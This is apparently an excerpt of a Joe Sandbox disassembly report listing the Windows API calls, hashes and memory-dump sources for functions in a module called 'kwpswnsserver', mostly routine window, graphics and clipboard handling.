                                                                  • API ID: Path$Find$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
                                                                  • String ID:
                                                                  • API String ID: 2323451338-0
                                                                  • Opcode ID: 514db4f91fd772c978e6db8cfea3eea3654b5c064fc0dd372a9594794be4e821
                                                                  • Instruction ID: e3d6ade2cd940c283200a747cbd6317308d3c4c671fbbe23ed8d863e4de6fbb4
                                                                  • Opcode Fuzzy Hash: 514db4f91fd772c978e6db8cfea3eea3654b5c064fc0dd372a9594794be4e821
                                                                  • Instruction Fuzzy Hash: 224199716446156FDB34EB28CD8CAEE737CFF01318F104EAAA459D2A40EB31DD45CA61
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 6C898F9B
                                                                  • EqualRect.USER32(?,00000000), ref: 6C898FB9
                                                                    • Part of subcall function 6C89BDD8: SetWindowPos.USER32(?,00000115,00000000,00000000,00000002,00000002,00000000,?,?,6C89946B,00000000,00000002,00000002,00000000,00000000,00000115), ref: 6C89BE00
                                                                  • IsWindowVisible.USER32(?), ref: 6C899074
                                                                  • CopyRect.USER32(?,?), ref: 6C8990B4
                                                                  • GetParent.USER32(?), ref: 6C899196
                                                                  • SetParent.USER32(?,?), ref: 6C8991AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: RectWindow$Parent$CopyEqualVisible
                                                                  • String ID:
                                                                  • API String ID: 3103310903-0
                                                                  • Opcode ID: b25ea2f0e4fd4ecaca7fc28357b43175699a3356c92ab482d27dfd9b03afce8c
                                                                  • Instruction ID: d74294c329b6b72be5661add5b83946534983dae9ff14039e4c6d77bf8a05eef
                                                                  • Opcode Fuzzy Hash: b25ea2f0e4fd4ecaca7fc28357b43175699a3356c92ab482d27dfd9b03afce8c
                                                                  • Instruction Fuzzy Hash: FC81D271641219AFDF289F7CCD88BEA77B9BF44308F1046A9E81ED6690DB349D44CB50
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,6C9E5A7B,00000002,00000000,?,?,?,6C9E5A7B,?,00000000), ref: 6C9E6143
                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,6C9E5A7B,00000002,00000000,?,?,?,6C9E5A7B,?,00000000), ref: 6C9E616C
                                                                  • GetACP.KERNEL32(?,?,6C9E5A7B,?,00000000), ref: 6C9E6181
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 2299586839-711371036
                                                                  • Opcode ID: 4ac5a8d32bbfe7c116ebddc2b13cff37d5f31561eec4fbdefef11b5103164ce5
                                                                  • Instruction ID: 5d0a7692a64b652d0295157edc70a25303658be4fe3c1bfa2ac116fb668777e2
                                                                  • Opcode Fuzzy Hash: 4ac5a8d32bbfe7c116ebddc2b13cff37d5f31561eec4fbdefef11b5103164ce5
                                                                  • Instruction Fuzzy Hash: AB213872704608E6E7178B1ACD01A8777BAFF6DB5CB1A8524EA09D7A02E732DF41C340
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 6C884651
                                                                  • InflateRect.USER32(?,?,?), ref: 6C88466D
                                                                  • BeginDeferWindowPos.USER32(?), ref: 6C8846E1
                                                                  • InvalidateRect.USER32(?,00000000,00000001,00000018,00000008,00000000,0000EA20), ref: 6C884750
                                                                  • EndDeferWindowPos.USER32(00000000), ref: 6C88494E
                                                                    • Part of subcall function 6C89BBF7: GetDlgItem.USER32(?,?), ref: 6C89BC08
                                                                    • Part of subcall function 6C88634B: GetClientRect.USER32(?,?), ref: 6C88636D
                                                                    • Part of subcall function 6C88634B: GetParent.USER32(?), ref: 6C886386
                                                                    • Part of subcall function 6C88634B: GetClientRect.USER32(?,?), ref: 6C8863B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$DeferWindow$BeginInflateInvalidateItemParent
                                                                  • String ID:
                                                                  • API String ID: 939197390-0
                                                                  • Opcode ID: 3b404d9280d5b6e9c32571fde70868952a747c9c6dd2576293bcb4599c049e90
                                                                  • Instruction ID: 16b4043f9e67a0b35e21e739e46f20f67d53340714f494cf831f66606483e0c9
                                                                  • Opcode Fuzzy Hash: 3b404d9280d5b6e9c32571fde70868952a747c9c6dd2576293bcb4599c049e90
                                                                  • Instruction Fuzzy Hash: ADB12732E01659EFDB28CFA8C990BEDFBB9FF89304F144529E519A7640D730A855CB90
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 6C888664
                                                                    • Part of subcall function 6C89BDD8: SetWindowPos.USER32(?,00000115,00000000,00000000,00000002,00000002,00000000,?,?,6C89946B,00000000,00000002,00000002,00000000,00000000,00000115), ref: 6C89BE00
                                                                  • SetRectEmpty.USER32(?), ref: 6C8886F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: RectWindow$Empty
                                                                  • String ID: @
                                                                  • API String ID: 650961088-2766056989
                                                                  • Opcode ID: c3cbe7bc87548dd005e0c51eaba6c7a00e7c45f073d305c6fe11a30e61371512
                                                                  • Instruction ID: 1dc66084bfca917344d581547aa772fd77a326aefd79a0b9d733245bba20c4d3
                                                                  • Opcode Fuzzy Hash: c3cbe7bc87548dd005e0c51eaba6c7a00e7c45f073d305c6fe11a30e61371512
                                                                  • Instruction Fuzzy Hash: C2E12771E012199FCB19CFA8DA84AEEBBF5FF48314F14852AE815B7780DB30A941CB54
                                                                  APIs
                                                                    • Part of subcall function 6C89BAAC: GetWindowLongW.USER32(?,000000EC), ref: 6C89BAB9
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 6C8C26CA
                                                                  • GetClientRect.USER32(?,?), ref: 6C8C286C
                                                                  • SetScrollPos.USER32(00000000,00000002,?,00000001), ref: 6C8C295A
                                                                    • Part of subcall function 6C8BF135: GetClientRect.USER32(?,?), ref: 6C8BF16F
                                                                    • Part of subcall function 6C8BF135: InflateRect.USER32(?,00000000,00000000), ref: 6C8BF1A9
                                                                    • Part of subcall function 6C8BF135: SetRectEmpty.USER32(?), ref: 6C8BF24D
                                                                    • Part of subcall function 6C8BF135: SetRectEmpty.USER32(?), ref: 6C8BF25A
                                                                    • Part of subcall function 6C8BF135: GetSystemMetrics.USER32(00000002), ref: 6C8BF27F
                                                                    • Part of subcall function 6C8BF135: EqualRect.USER32(?,?), ref: 6C8BF34C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientEmpty$AsyncEqualInflateLongMetricsScrollStateSystemWindow
                                                                  • String ID:
                                                                  • API String ID: 3234605627-0
                                                                  • Opcode ID: 1e6f002623c0668ba329507a273fae6fcc9d9c157c6e320fc6f45fe48805c93f
                                                                  • Instruction ID: 84425c15789cf2ed6a89db546154e554f1684a94a43cb859c1973f7c11ff34f2
                                                                  • Opcode Fuzzy Hash: 1e6f002623c0668ba329507a273fae6fcc9d9c157c6e320fc6f45fe48805c93f
                                                                  • Instruction Fuzzy Hash: C9C1F53470121A8BDF299B28C998BBD37B1BF45308F105979D816AB7C5DB78EC45CB82
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$H_prolog3Iconic
                                                                  • String ID:
                                                                  • API String ID: 881905488-0
                                                                  • Opcode ID: 6b37bea3d911566ad056f2fd645031a996e5fe7dbc3553dfab122fa0538048be
                                                                  • Instruction ID: aed00c924ed23e1e5f726a22ae00dac025e8ae88e3d1f22e708cd4b16bbff7e2
                                                                  • Opcode Fuzzy Hash: 6b37bea3d911566ad056f2fd645031a996e5fe7dbc3553dfab122fa0538048be
                                                                  • Instruction Fuzzy Hash: B921B032600219ABCF365FA9CE08B9E7B75BF48318F004A24F919D7A50EB35D8169B90
                                                                  APIs
                                                                  • OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,0000007C,?,6C88A657,?,6CA42438,00000010,6C88F6FD,?), ref: 6C880EDC
                                                                  • GetLastError.KERNEL32(6C88F6FD,0000007C,?,6C88A657,?,6CA42438,00000010,6C88F6FD,?), ref: 6C880F13
                                                                    • Part of subcall function 6C8810EA: GetModuleFileNameW.KERNEL32(?,?,00000105,?,6C88A657,?,6CA42438,00000010,6C88F6FD,?), ref: 6C88119A
                                                                    • Part of subcall function 6C8810EA: SetLastError.KERNEL32(0000006F,?,6C88A657,?,6CA42438,00000010,6C88F6FD,?), ref: 6C8811AE
                                                                  Strings
                                                                  • IsolationAware function called after IsolationAwareCleanup, xrefs: 6C880ED7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$DebugFileModuleNameOutputString
                                                                  • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                  • API String ID: 3265401609-2690750368
                                                                  • Opcode ID: 69ba4682bc6c49d8fd8c873375935f1713b4fd589109f84bf5b6bcee2910692b
                                                                  • Instruction ID: dd9b64f0669acd70bfb905587d5289c2e8a8f409c74998489dc5ed35b035bb8e
                                                                  • Opcode Fuzzy Hash: 69ba4682bc6c49d8fd8c873375935f1713b4fd589109f84bf5b6bcee2910692b
                                                                  • Instruction Fuzzy Hash: 3CF022323173E7874B380AA98F0066B32B4AB1675CB61CD39E911C2F80D730E402C7E0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Iconic
                                                                  • String ID:
                                                                  • API String ID: 110040809-0
                                                                  • Opcode ID: 1b21dd58b953df3973d59377cd77909a6ee18481124f247295fc4cd18b32c9c9
                                                                  • Instruction ID: d48289f1ed9d9ce7751d6d5348699ae0ff82a8ac7e12113732eae58ba05ea6e9
                                                                  • Opcode Fuzzy Hash: 1b21dd58b953df3973d59377cd77909a6ee18481124f247295fc4cd18b32c9c9
                                                                  • Instruction Fuzzy Hash: 96D0C936159770CBC7355A5AA944BC677A6BB4932AF050929D04681DA0D6E1A891CBC0
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C90223D
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,6CA37ABC,00000000,6CA37E94,00000000,6CA3528C,00000000,?,?,00000A88,6C9046E9,?,00000000,00000038), ref: 6C9022DC
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,6CA3528C,00000000,?,?,00000A88,6C9046E9,?,00000000,00000038), ref: 6C90238F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateH_prolog3_ModuleName
                                                                  • String ID:
                                                                  • API String ID: 3408945735-3916222277
                                                                  • Opcode ID: ad4d1cfb20c78f25049a1d9153e724e70e9290b2004e708987e682933d97a7b2
                                                                  • Instruction ID: af835579baceb0d8642cda2fb3675f19da4a72d487b6306ffb3ed7b0cbff9f88
                                                                  • Opcode Fuzzy Hash: ad4d1cfb20c78f25049a1d9153e724e70e9290b2004e708987e682933d97a7b2
                                                                  • Instruction Fuzzy Hash: 10C19F72B00724AFDF249F64CC58FEA77B8AB4A314F1045A9F909E2950DB709E85CF61
                                                                  APIs
                                                                  • RegisterClipboardFormatW.USER32(Native), ref: 6C9C15B6
                                                                  • RegisterClipboardFormatW.USER32(OwnerLink), ref: 6C9C15C3
                                                                  • RegisterClipboardFormatW.USER32(ObjectLink), ref: 6C9C15D1
                                                                  • RegisterClipboardFormatW.USER32(Embedded Object), ref: 6C9C15DF
                                                                  • RegisterClipboardFormatW.USER32(Embed Source), ref: 6C9C15ED
                                                                  • RegisterClipboardFormatW.USER32(Link Source), ref: 6C9C15FB
                                                                  • RegisterClipboardFormatW.USER32(Object Descriptor), ref: 6C9C1609
                                                                  • RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 6C9C1617
                                                                  • RegisterClipboardFormatW.USER32(FileName), ref: 6C9C1625
                                                                  • RegisterClipboardFormatW.USER32(FileNameW), ref: 6C9C1633
                                                                  • RegisterClipboardFormatW.USER32(Rich Text Format), ref: 6C9C1641
                                                                  • RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 6C9C164F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClipboardFormatRegister
                                                                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                  • API String ID: 1228543026-2889995556
                                                                  • Opcode ID: 843b02d527384dd43495c42aa65b2bf7ef76dc96264681c81f238dfd584e2cde
                                                                  • Instruction ID: c649be65b6498e510f463b79be9abe5e3005cafeeee542f808a9ebea07f36f75
                                                                  • Opcode Fuzzy Hash: 843b02d527384dd43495c42aa65b2bf7ef76dc96264681c81f238dfd584e2cde
                                                                  • Instruction Fuzzy Hash: F0114872A017219FCB346FBD9D2C4467EB0BA4B3063009E19A19EC7A00DA39D586CFD4
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C882D7B
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882DD0
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882DE8
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882E00
                                                                  • GetObjectW.GDI32(00000004,00000018,?), ref: 6C882E20
                                                                  • CreateBitmap.GDI32(?,?,?,?,00000000), ref: 6C882E46
                                                                  • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,6C9FDA60), ref: 6C882E69
                                                                  • CreatePatternBrush.GDI32(?), ref: 6C882E7B
                                                                  • DeleteObject.GDI32(?), ref: 6C882EAA
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 6C882EBB
                                                                  • GetPixel.GDI32(?,00000000,00000000), ref: 6C882F03
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C882F29
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 6C882F51
                                                                  • FillRect.USER32(?,?,?), ref: 6C882FB3
                                                                    • Part of subcall function 6C884000: __EH_prolog3.LIBCMT ref: 6C884007
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 6C882FE1
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 6C882FFC
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 6C883013
                                                                  • DeleteDC.GDI32(00000000), ref: 6C883080
                                                                  • DeleteDC.GDI32(00000000), ref: 6C88309C
                                                                  • DeleteDC.GDI32(00000000), ref: 6C8830BB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Delete$BitmapCompatible$Object$BrushFillH_prolog3H_prolog3_PatternPixelRect
                                                                  • String ID:
                                                                  • API String ID: 308707564-0
                                                                  • Opcode ID: 03d32cb389597210dc81b5dce2b01bbc3fc0f747e7c97ba5011bd800e81bf6d3
                                                                  • Instruction ID: b6deefd6bebce76f61467cfb539f21335fcf8ff9ae471c95d9d194b40d67cf7a
                                                                  • Opcode Fuzzy Hash: 03d32cb389597210dc81b5dce2b01bbc3fc0f747e7c97ba5011bd800e81bf6d3
                                                                  • Instruction Fuzzy Hash: 84B1F3B1D02219AFDF219FA4CE94AEEBB79FF08348F204429F515A7A50DB319D15DB20
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C904231
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C904279
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 6C90429A
                                                                  • SelectObject.GDI32(?,?), ref: 6C9042D5
                                                                  • CreateCompatibleDC.GDI32(?), ref: 6C904302
                                                                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 6C90436A
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C904381
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C904393
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C9043AA
                                                                  • DeleteObject.GDI32(?), ref: 6C9043B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$Create$Compatible$DeleteH_prolog3_Section
                                                                  • String ID: $(
                                                                  • API String ID: 1429849173-55695022
                                                                  • Opcode ID: b450eb202e0ebfe4134e628563f42c070ffa8adb1c25a327f76aa267643a48b9
                                                                  • Instruction ID: fd70167072c0e4dbf136625e73d55d996e4008b3b09ca06aeb95129abd40f538
                                                                  • Opcode Fuzzy Hash: b450eb202e0ebfe4134e628563f42c070ffa8adb1c25a327f76aa267643a48b9
                                                                  • Instruction Fuzzy Hash: 4FB15C71A00229DFDB25DF64CD54B9EBBB9BF59304F0082EAE449E7651DB308A85CF20
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  • GetParent.USER32(?), ref: 6C88BC74
                                                                  • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C88BC96
                                                                  • GetWindowRect.USER32(?,?), ref: 6C88BCBA
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C88BCDA
                                                                  • MonitorFromWindow.USER32(00000000,00000001), ref: 6C88BD13
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 6C88BD1A
                                                                  • CopyRect.USER32(?,?), ref: 6C88BD28
                                                                  • GetWindowRect.USER32(00000000,?), ref: 6C88BD35
                                                                  • MonitorFromWindow.USER32(00000000,00000002), ref: 6C88BD42
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 6C88BD49
                                                                  • CopyRect.USER32(?,?), ref: 6C88BD57
                                                                  • GetParent.USER32(?), ref: 6C88BD61
                                                                  • GetClientRect.USER32(00000000,?), ref: 6C88BD6E
                                                                  • GetClientRect.USER32(00000000,?), ref: 6C88BD79
